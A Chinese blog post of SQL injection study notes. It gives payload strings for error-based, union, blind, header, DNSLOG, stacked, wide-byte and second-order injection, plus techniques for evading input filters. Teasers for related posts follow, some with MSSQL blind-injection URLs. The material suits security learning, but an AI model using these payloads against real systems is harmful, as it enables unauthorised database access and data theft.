sql注入笔记整理

最新推荐文章于 2025-02-14 16:12:22 发布
原创 最新推荐文章于 2025-02-14 16:12:22 发布 · 823 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #笔记 #数据库

  • 概念
    • 发生在与数据库交互时;将未经过滤的用户输入信息合并到执行代码中造成恶意代码的执行
  • 错误注入
    • extractvalue(xml_flag,xpath)
      • 如果出错打印xpath内容;数据库不识别#~符号
      • extractvalue(1,concat('~',database(),'~')) 会打印出~数据库名~
    • updatexml(xml_document,xpath,new_xml)
      • 用法和extractvalue()函数类似;报错返回xpath内容
      • updatexml(1,concat('~',database(),'~'),1)
    • gtid_subset(设置1,设置2)
      • 报错打印设置1的内容;设置1报错则不会执行设置2
      • gtid_subset(user(),1)
    • exp()
      • e的幂次方;八个字节
      • exp(709) 是边界
      • exp(710) 就会报错;一般搭配截取函数注入、
    • polygon()
      • 报错直接把上级表名和数据库名报出来
      • 输入一般为字段名,字段名不对则不会执行
    • join()
      • ' union select * from (select * from users a join users b)x--+
      • ' union select * from (select * from users a join users b using(id))x--+
      • ' union select * from (select * from users a join users b using(id,username))x--+
      • ' union select * from (select * from users a join users b using(id,username,password))x limit 1,1--+
    • mssql报错注入小技巧
      • 1'and convert(int,db_name())='1
      • id=1/user,'+1-system_user='1
  • 联合注入
    • 字段数相同+数据类型相同
    • 利用order by 判断字段数
      • order by 8
        • 按照第8个字段排序;没有则报错
    • union select 1,2,3
  • 盲注
    • 布尔盲注
      • 回显内容只有两种情况;可以用于辨别输入语句正确与否
      • 根据回显内容进行判断是否注入成功
    • 时间盲注
      • 回显内容一点变化都没有
      • 根据响应时间判断是否注入成功
  • UA注入
    • 在User-Agent字段内容注入
    • 该位置不会url解析;直接用空格;不能用+代替
    • 一般采用语句位insert或update
  • Referer注入
    • 和UA要求相同
    • 一般采用语句位insert或update
  • Cookie注入
    • 和普通注入相同
  • DNSLOG注入
    • 注入实现条件
      • root权限
      • secure_file_priv(无设置或者设置为指定文件夹)
        • null :表示不允许导入导出
        • 没设置:无限制
        • 指定文件夹:只能在指定文件夹中使用
        • 通过 show global variables like 'secure%'; 进行查看该设置
      • load_file(文件完整路径):
        • 读取文件内容为一个字符串
        • unc路径:
          • //服务器名/共享资源名 格式:\\ren\share.txt 或者 //ren/share.txt ren 是服务器名 share.txt 共享资源文件名
  • 堆叠注入
    • 利用分号进行分割导致多条语句执行
    • 如select 1,2,3 from table; select 4,5,6 from table1; #where id =1;
    • 利用输入过滤不严格导致分号可以终结语句,此时可以实现多条语句进行执行,注释符注释掉后面的所有内容
  • 宽字节注入
    • 针对于GBK编码的
    • GBK编码是将两个字符合并为一个中文字符;即输入的特殊符号都会和转义字符进行组合形成一个中文字符
    • 此时可以利用添加字符的方式将转义字符吃掉,使自己的特殊字符起作用
    • 如输入1’ 会被转义为 1\' 表现为 31 5c27 5c27会表示一个中文字符,此时输入1%df' 就会转为 31 df5c 27 df5c会形成一个汉字,但是单引号独立出来了,可以执行了
    • 常用的宽字节吞噬符号有:
  • 二次注入
    • 通过注册带有恶意字符的用户名,然后在使用用户名和密码进行操作的时候(修改密码,查询,更新)实现出入效果
    • 如注册用户名为admin'# 的用户名,在修改密码的情况下会自动识别为admin用户,这样就可以对admin用户进行操作
  • 截取函数
    • left()
    • right()
    • substring()
    • substr()
    • mid() 用法同substr()
  • 条件判断
    • if(a,b,c)
      • a为真执行b;a为假时执行c
      • 常与时间盲注搭配
        • and if('a'='a',sleep(1),sleep(5)) --+
    • case when a>b then a else b end
      • 结尾必须为end
  • 常用数据库
    • information_schema (mysql 5.0 以上才有)
      • schemata 存放数据库名的表
        • schema_name 数据库名
      • tables 存放所有表名的表
        • table_schema 表所在的数据库名
        • table_name 表名
      • columns 存放所有字段的表
        • table_schema 数据库名
        • table_name 表名
        • column_name 字段名
  • 常用函数
    • ascii() 将字符转为ascii码
    • char() 将ascii码转为字符
    • length() 获取字符的长度
    • database() = schema()
    • version()
    • user()
    • current_user()
    • session_user()
    • system_user()
    • load_file() 转换成16进制或10进制mysql读取本地文件的函数
    • @@datadir 数据库路径
    • @@basedir mysql安装路径
    • @@version_compile_os 操作系统
  • 小技巧
    • 语言
      • 政府/国企/央企 大多是oracle
      • asp:SQL Server,Access
      • .net:SQL Server
      • php:MySQL,PostgreSQL
      • java:Oracle,MySQL
    • 注释符
      • /*是MySQL数据库的注释符
      • --是Oracle和SQL Server支持的注释符
      • ;是子句查询标识符,Oracle不支持多行查询,若返回错误,则说明可能是Oracle数据库
      • #是MySQL中的注释符,返回错误则说明可能不是MySQL,另外也支持-- 和/**/
      • /*!*/内联注释
        • 如果数据库版本高于输入版本号;那么该语句会当成sql进行执行;
          • 如 select * from users /*!union select 1,2,3*/;
        • 反之则会当成注释内容
          • select * from users /*!70000 union select 1,2,3*/;
          • 我的数据库版本是5.7.0;就是50700<70000;所以这里内联注释中的内容会当成注释处理
    • 截取函数(substr substring)
      • MySQL两个函数都可以使用
      • Oracle只可调用substr
      • SQL Server只可调用substring
    • 拼接
      • mysql :'a'+'b'='ab' concat('a','b')='ab'
      • oracle :'a'||'b'='ab' concat('a','b')='ab'
      • mssql :'a'+'b'='ab'
  • 常见过滤绕过手法
    • and or 关键字绕过
      • && || 替换;有时候&&需要使用url编码%26%26
      • 双写绕过
    • = 过滤
      • <> > < like as in rlike regexp
    • 空格过滤
      • %09 %0a %0b %0c %0d + /**/
    • 注释符过滤
      • %00
    • union select 过滤
      • 双写绕过
      • union all select (只针对整体过滤的情况)
    • 逗号过滤
      • from for
        • substr(database() from 1 for 1)
        • 可以代替逗号,表示起始位和输出数量
      • offset
        • limit 0 offset 1
    • 截取函数被过滤了
      • locate()
      • position()
      • instr()

10

SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 7727
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
SQL注入(一)联合查询 报错注入
m0_63306943的博客
04-21 2194
是web网站的常见攻击技术,如果权限足够的话它可以通过sql注入的方式1.知道物理路径可以进行木马的上传2.可以进行udf的提权3.可以通过注入获取到数据库中的数据。sql注入产生的原因:在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的“数据拼接到SQL语句中后,被当作SQL语句的一部分执行。
Mssql报错注入
ChuMeng1999的博客
10-29 1498
报错信息为Y,说明is_srvrolemember(‘sysadmin’)的值为1,可以断定当前的数据库用户属于管理员组。通过该实验可以让用户掌握常见的mssql报错原理,数据类型转换错误,group by having的报错,掌握mssql中常见的几个系统函数。2.把参数id后面的1替换为@@version,参数ID为整型数据,因为字符串型的数据无法转换成整数型的数据,所以出现了报错现象。@@version表示获取数据库的版本,因为不同版本的数据有略微的差别,所以获取数据的版本信息还是很重要的。
SQL注入漏洞(MSSQL注入
errorr0
07-05 2880
MSSQL注入的入门讲解
SQL注入漏洞-Mssql报错注入
HacHunter的博客
03-07 2353
MssqlSql Sever,SQL Server 是Microsoft 公司推出的关系型数据库管理系统,Sql Sever通常与IIS服务器搭配使用。 在mssql注入过程中,经常用到一些mssql中的系统函数,这些系统函数有助于帮助获取目标站点的信息: User;user_name();system_user用户 db_name():当前数据库的名字 host_name():主机名字 @@version:数据库版本 @@servername:服务器名称 @@language:当前所使用语
SQL注入笔记整理
m0_55306747的博客
08-28 1405
2.1sql注入(高危):数据库sql语句。用户可控的参数可以被拼接到程序的sql语句中并被成功执行,那么用户就可以自由控制来构造sql语句ps:拓展sql注入一个比较快捷的用法是通过or关键字绕过检索限制or 1=1分类:根据注入点所在位置分为get注入注入点在url参数post注入注入点在请求主体cookie注入注入点在cookiexff注入等:注入点在xff头根据注入方法分类联合注入布尔注入回显不同证明延时注入延时证明漏洞报错注入。..................
瞎瘠薄整理SQL注入笔记
Stars的博客
10-02 941
瞎瘠薄整理SQL注入笔记 1、sql注入类型         按数据类型分类:               整形               字符型
SQL注入方法-报错注入
acepanhuan的博客
02-11 1342
SQL注入方法-报错注入
sql注入报错注入
2401_82760239的博客
04-02 2192
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
初级黑客入门之sql注入报错分享(mssql+mysql),黑客技术零基础入门到精通实战教程!
最新发布
白帽阿叁的博客
02-14 1017
当超过mysql的整形的时候,就会导致溢出,mysql可能会将错误信息带出。这里user()是字母默认为0 取反以后+1可能就会导致异常。不需要函数 ,直接让他报错出来也可以利用函数的参数让其报错absExpAvgBIT_AND后续还有很多就不一一列举了,直接burp跑一波结果其他请自行fuzz。
sql注入报错分享(mssql+mysql
2401_83799022的博客
11-22 1008
由于mysql的主键不允许重复,会抛出Duplicate entry的异常,所以可以通过有规律的插入主键来导致报错。这里通过随机数来获取组件范围,只要我们让返回的数据能满足规律,就会导致报错,这里我通过fuzz 发现了以下的函数可以满足。当超过mysql的整形的时候,就会导致溢出,mysql可能会将错误信息带出。当我们需要搜索的是字符串 我们可以通过+1让他直接报错,基本可以捶很多的函数了,这里只列举一些。mysql报错内容比较多 网上也有比较多的 这里重复的就不多介绍了。也可以利用函数的参数让其报错
SQL注入(Access、Mssql)
jxy158212的博客
01-03 1980
之前的文章,已经详细介绍了sql注入的原理,和常见sql注入方式,并以MySql数据库进行了简单的示例。接下来,我们将以Access和Mssql数据库为例进行讲解。
常见安全设备默认口令整理,网络安全零基础入门到精通教程!
白帽阿叁的博客
11-19 1755
大家好,我是程序员晓晓。给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取要学习一门新的技术,作为新手。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。
SQL注入之路之三:报错注入
weixin_62715196的博客
08-10 924
主要简述什么是报错注入报错注入常用函数,报错注入原理以及如何使用爆破注入获取用户敏感信息
mssql报错注入原理及流程实例
buffedon的博客
05-19 1410
mssql报错注入原理及流程实例mssql 报错注入1. 原理2. mssql 测试实例2.1 找注入点2.2 判断类型2.3 获取信息获取数据库的数量获取数据库名获取表名获取列名获取列中的值 mssql 报错注入 1. 原理 在MSSQL中,数据类型不一样(例如1=‘1’)会报错,并且报错信息会在日志信息中显示出来;日志文件直接在网页上显示 利用此原理,进行构造 1=‘mssql语句’,返回报错信息 2. mssql 测试实例 2.1 找注入sql注入漏洞一般都在输入框,搜索框,域名地址
渗透测试之MSSQL盲注(布尔盲注+时间盲注+报错注入
LKmnbZ's Blog
11-08 2846
1. 布尔盲注 http://192.168.20.155/test.aspx?id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)) >= 109 2. 时间盲注 http://192.168.20.155/test.aspx?id=1;if (select ...
SQL Server手工注入方式
渗透之路,攻防之间皆学问
01-04 7692
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
SQL注入报错注入方法汇总
wanggonghanfei的博客
10-03 2872
响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面0.2 类型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值